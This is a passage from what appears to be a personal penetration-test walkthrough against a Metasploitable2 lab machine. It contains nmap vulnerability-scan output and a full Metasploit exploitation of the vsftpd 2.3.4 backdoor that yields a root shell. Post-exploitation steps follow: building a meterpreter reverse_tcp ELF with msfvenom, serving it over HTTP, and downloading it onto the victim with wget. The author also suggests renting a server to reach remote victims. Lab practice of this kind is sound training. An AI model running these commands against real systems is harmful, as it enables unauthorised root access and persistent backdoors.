|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|   Possible sqli for forms:
|     Form at path: /mutillidae/index.php, form's action: index.php. Fields that might be vulnerable:
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|_      initials
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
| rmi-vuln-classloader: 
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|       
|     References:
|_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
5432/tcp open  postgresql
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       http://www.cvedetails.com/cve/2014-0224
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown: 
5900/tcp open  vnc
|_sslv2-drown: 
6000/tcp open  X11
6667/tcp open  irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
8009/tcp open  ajp13
8180/tcp open  unknown
| http-cookie-flags: 
|   /admin/: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/index.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/account.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin_login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/home.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin-login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/adminLogin.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/controlpanel.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/cp.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/index.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/home.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/controlpanel.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin-login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/cp.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/account.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin_login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/adminLogin.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/jscript/upload.html: 
|     JSESSIONID: 
|_      httponly flag not set
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /admin/login.html: Possible admin folder
|   /admin/admin.html: Possible admin folder
|   /admin/account.html: Possible admin folder
|   /admin/admin_login.html: Possible admin folder
|   /admin/home.html: Possible admin folder
|   /admin/admin-login.html: Possible admin folder
|   /admin/adminLogin.html: Possible admin folder
|   /admin/controlpanel.html: Possible admin folder
|   /admin/cp.html: Possible admin folder
|   /admin/index.jsp: Possible admin folder
|   /admin/login.jsp: Possible admin folder
|   /admin/admin.jsp: Possible admin folder
|   /admin/home.jsp: Possible admin folder
|   /admin/controlpanel.jsp: Possible admin folder
|   /admin/admin-login.jsp: Possible admin folder
|   /admin/cp.jsp: Possible admin folder
|   /admin/account.jsp: Possible admin folder
|   /admin/admin_login.jsp: Possible admin folder
|   /admin/adminLogin.jsp: Possible admin folder
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
|   /admin/jscript/upload.html: Lizard Cart/Remote File upload
|_  /webdav/: Potentially interesting folder
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 330.59 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 

The above output shows the list of vulnerabilities and they are as follows:

actually with the below output result and we will do vulnerability analysis via FTP (vsftpd service)

PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|_sslv2-drown: 

The attack Procedure

we can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.

The concept of the attack on VSFTPD 2.3.4 is to trigger the malicious execution, results in opening the backdoor on port 6200 of the system.

Let's Exploiting

The following result of the vulnerabole sourece code will make things much clearer:

-    else if((p_str->p_buf[i]==0x3a)
-    && (p_str->p_buf[i+1]==0x29))
-    {
-      vsf_sysutil_extra();
-    }
   }

We can clearly see that if the bytes in the network buffer match the backdoor sequence of 0x3a (colon) and 0x29, the malicious function is triggered. 

Furthermore, is we explore the details of the malicious function, we can see the following function definition for the malicious function:

Click Here For More Info - https://pastebin.com/AetT9sS5

sa.sin_port=6200 serves as the backdoor port and all the commands sent to the service get executed using the execl("/bin/sh","sh",(char *)0); function.

Vulnerability analysis of VSFTPD 2.3.4 backdoor

After modeling threats, let us load the matching module into Metasploit using the use exploit/unix/ftp/vsftpd_234_backdoor command and analyze the vulnerability details using info command as follows:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfconsole -q                                                                                                       
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > 
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info 

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

Provided by:
  hdm 
  MC 

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
  RPORT   21               yes       The target port (TCP)

Payload information:
  Space: 2000
  Avoid: 0 characters

Description:
  This module exploits a malicious backdoor that was added to the 
  VSFTPD download archive. This backdoor was introduced into the 
  vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 
  according to the most recent information available. This backdoor 
  was removed on July 3rd 2011.

References:
  OSVDB (73573)
  http://pastebin.com/AetT9sS5
  http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Now we are going to add RHOST, RPORT, show payload, use payload and check about these options & finally we will exploit...

We can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

And as you can after exploiting we can do many things but one thing is that one problem here and problem is how to maintain accessability with these exploitation because after exit from the exploitation then it will destroy the session and after that we have to exploit again to get access or run the command

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530

whoami
root
pwd
/

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

ls -la
total 125
drwxr-xr-x  21 root root  4096 May 20  2012 .
drwxr-xr-x  21 root root  4096 May 20  2012 ..
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  14 root root 13500 Jul  9 13:48 dev
drwxr-xr-x  94 root root  4096 Jul  9 14:41 etc
drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x  13 root root  4096 May 13  2012 lib
drwx------   2 root root 16384 Mar 16  2010 lost+found
drwxr-xr-x   4 root root  4096 Mar 16  2010 media
drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
-rw-------   1 root root 41871 Jul  9 13:49 nohup.out
drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
dr-xr-xr-x 118 root root     0 Jul  9 13:48 proc
drwxr-xr-x  13 root root  4096 Jul  9 13:49 root
drwxr-xr-x   2 root root  4096 May 13  2012 sbin
drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
drwxr-xr-x  12 root root     0 Jul  9 13:48 sys
drwxrwxrwt   4 root root  4096 Jul  9 14:07 tmp
drwxr-xr-x  12 root root  4096 Apr 28  2010 usr
drwxr-xr-x  14 root root  4096 Mar 17  2010 var
lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server

Post Exploitation

After gaining knowledge about this vulnerability and gaining access, let us now exploit once again because we want to access of this vuln to maintain and undercover control in ownself. Let us now exploit the target system. Let us see what options we need to set before firing the exploit onto the target. we can do this by running the show options command, as shown following..

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact

We can see that we have only two options, which are RHOST and RPORT, we set RHOST as the IP address of the target and RPORT as 21, which is the port of the vulnerable FTP server.

Next we can check for the matching payloads via the show payloads command to see what payloads are suitable for this particular exploit module.we can see only a single payload which is payload/cmd/unix/interact. We can use this payload using the set payload cmd/unix/interact command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530

whoami
root
pwd
/

Vola!! we got it we goot root access to the target system. So, what's next? Since wehave got a simple shell, let us try gaining better control over the target by spawning a meterpreter shell.

In order to maintain the access and meterpreter shell, we need to create a client-oriented payload, upload it to the target system, and execute it. so, lets get started....

sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf

This is own IP 192.168.43.152...

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf                 
[sudo] password for hackerboy: 
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls                             
backdoor.elf  ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 

We can use a great utility called msfvenom to generate a meterpreter payload, as shown in the preceding screenshot. The -p switch defines the payload to use, while LHOST and LPORT define our IP address and port number that backdoor.elf file will connect to in order to provide us meterpreter access to the target. The -f switch defines the ourput type, and elf is the default extension for the linux-based systems.

But what happend next, shall we go to our victim's system and do post-exploitation? No, nothing like this is going to happen, we will maintain access to materpreter shell through exploit and if you say, with the help of apache server on our system, we will upload the shell to the victim's system.

If your Victim is on another network means away from you, then we can buy and host a server for this and then upload it onto the target machine.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo service apache2 start                                                                              
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo mv backdoor.elf /var/www/html/                                                                                      
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 

whoami
root
pwd
/


wget http://192.168.43.152/backdoor.elf       
--16:06:29--  http://192.168.43.152/backdoor.elf
           => `backdoor.elf'
Connecting to 192.168.43.152:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207

    0K                                                       100%    7.65 MB/s

16:06:29 (7.65 MB/s) - `backdoor.elf' saved [207/207]

We can download the file via the wget command, as shown in the preceding screenshot. Now, in order to allow the victim system to communicate with Metasploit, we need to set up an exploit handler on our system. The handler will allow communication between the target and Metasploit using the same port and payload we used in the backdoor.elf file.

OR (2nd method to upload a backdoor file in our victim machine)

We can upload a backdoor in our victim's machine by python's http.server..like this

┌──(hackerboy㉿KumarAtulJaiswal)-[/var/www/html/backdoor]
└─$ python3 -m http.server 1234                                                                                                   1 ⨯
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 - 

and after then, in out victim's machine , we get a backdoor file via wget  command :-

whoami
root
pwd
/

wget http://127.0.0.1/backdoor.elf

--2021-07-10 00:47:02--  http://127.0.0.1/backdoor.elf
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
Saving to: ‘backdoor.elf’

backdoor.elf                      100%[===========================================================>]     207  --.-KB/s    in 0s      

2021-07-10 00:47:02 (23.1 MB/s) - ‘backdoor.elf’ saved [207/207]

